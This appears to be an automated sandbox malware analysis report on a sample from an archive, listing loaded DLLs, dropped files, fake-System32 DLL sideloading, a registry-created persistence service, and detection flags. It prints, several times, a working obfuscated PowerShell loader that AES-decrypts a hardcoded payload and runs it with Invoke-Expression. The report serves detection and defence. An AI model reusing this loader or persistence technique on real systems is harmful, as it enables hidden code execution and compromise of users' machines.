Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ninput.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ninput.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: thumbcache.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.ui.fileexplorer.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cldapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uiribbon.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryclient.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: structuredquery.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ehstorshell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: networkexplorer.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mrmdeploy.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: provsvc.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows \System32\printui.exe Section loaded: uxtheme.dll
Source: C:\Windows \System32\printui.exe Section loaded: printui.dll
Source: C:\Windows \System32\printui.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: F.7z Static file information: File size 77248657 > 1048576
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: usvc.dat.31.dr
Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000002E.00000002.2378540668.00007FFA243AB000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.31.dr, usvc.dat.31.dr
Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB
Suspicious command line found
Source: C:\Windows \System32\printui.exe Process created: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows \System32\printui.exe Process created: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency, 51_2_00007FFA3312B470
PE file contains sections with non-standard names
Source: x249569.dat.16.dr Static PE information: section name: _RDATA
Source: x249569.dat.16.dr Static PE information: section name: .fptable
Source: x249569.dat.26.dr Static PE information: section name: _RDATA
Source: x249569.dat.26.dr Static PE information: section name: .fptable
Source: console_zero.exe.31.dr Static PE information: section name: .fptable
Source: vcruntime140d.dll.31.dr Static PE information: section name: _RDATA
Source: libiconv-2.dll.31.dr Static PE information: section name: .xdata
Source: libiconv-2.dll.31.dr Static PE information: section name: /4
Source: libiconv-2.dll.31.dr Static PE information: section name: /19
Source: libiconv-2.dll.31.dr Static PE information: section name: /31
Source: libiconv-2.dll.31.dr Static PE information: section name: /45
Source: libiconv-2.dll.31.dr Static PE information: section name: /57
Source: libiconv-2.dll.31.dr Static PE information: section name: /70
Source: libiconv-2.dll.31.dr Static PE information: section name: /81
Source: libiconv-2.dll.31.dr Static PE information: section name: /92
Source: libintl-9.dll.31.dr Static PE information: section name: .xdata
Source: libintl-9.dll.31.dr Static PE information: section name: /4
Source: libintl-9.dll.31.dr Static PE information: section name: /19
Source: libintl-9.dll.31.dr Static PE information: section name: /31
Source: libintl-9.dll.31.dr Static PE information: section name: /45
Source: libintl-9.dll.31.dr Static PE information: section name: /57
Source: libintl-9.dll.31.dr Static PE information: section name: /70
Source: libintl-9.dll.31.dr Static PE information: section name: /81
Source: libintl-9.dll.31.dr Static PE information: section name: /92
Source: libwinpthread-1.dll.31.dr Static PE information: section name: .xdata
Source: x338625.dat.31.dr Static PE information: section name: .fptable
Source: usvc.dat.31.dr Static PE information: section name: _RDATA
Source: usvc.dat.31.dr Static PE information: section name: .fptable
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C51551B8 push es; retf 34_2_00007FF9C5158447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5158341 push es; retf 34_2_00007FF9C5158447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C53B46DC push ds; retf 34_2_00007FF9C53B474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C53B7BD4 push esi; ret 34_2_00007FF9C53B7BD7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F711E pushfd ; iretd 34_2_00007FF9C54F7121
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F61CC pushad ; iretd 34_2_00007FF9C54F6251
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5750080 push esp; iretd 34_2_00007FF9C5750139
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C57537F0 push eax; retf 34_2_00007FF9C5753889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C57537EB push eax; retf 34_2_00007FF9C5753889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C575000B push esp; iretd 34_2_00007FF9C5750139
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5753840 push eax; retf 34_2_00007FF9C5753889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C58B612E push esp; retf 34_2_00007FF9C58B6139
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5B97050 push ebx; ret 34_2_00007FF9C5B9BE7A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5B7746E push eax; iretd 34_2_00007FF9C5B7747D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5B77430 pushad ; iretd 34_2_00007FF9C5B7746D
Source: C:\Windows\System32\svchost.exe Code function: 46_2_649487B2 push r11; ret 46_2_649487ED
Source: C:\Windows\System32\svchost.exe Code function: 46_2_660224A8 push rax; retf 46_2_660224B1
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829984B push 00000000h; retf 46_2_68299850
Source: C:\Windows\System32\svchost.exe Code function: 46_2_682970AC push rax; iretd 46_2_682970AD
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829998B push 00000000h; ret 46_2_68299990
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829999B push 00000000h; iretd 46_2_682999A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829AA73 push 00000000h; ret 46_2_6829AA78
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829ABBB push 00000000h; retf 46_2_6829ABC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829ABB3 push 00000000h; ret 46_2_6829ABB8
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829A7AB push 00000000h; iretd 46_2_6829A7B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3C2B8 push 050001C2h; retn 0001h 46_2_00007FFA2CE3C2C5
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3C2D0 push 680001C2h; retn 0001h 46_2_00007FFA2CE3C2D5
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3C2C8 push 680001C2h; retn 0001h 46_2_00007FFA2CE3C2CD

Persistence and Installation Behavior
barindex
Creates a Windows Service pointing to an executable in C:\Windows
Source: C:\Windows\System32\reg.exe Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x338625\Parameters ServiceDll C:\Windows\System32\x338625.dat
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows \System32\printui.exe Jump to behavior
Drops PE files
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\printui.exe Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll Jump to dropped file
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\x249569.dat Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x338625.dat Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\usvc.dat Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll Jump to dropped file
Source: C:\Program Files\7-Zip\7zFM.exe File created: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\printui.exe Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll Jump to dropped file
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\x249569.dat Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x338625.dat Jump to dropped file
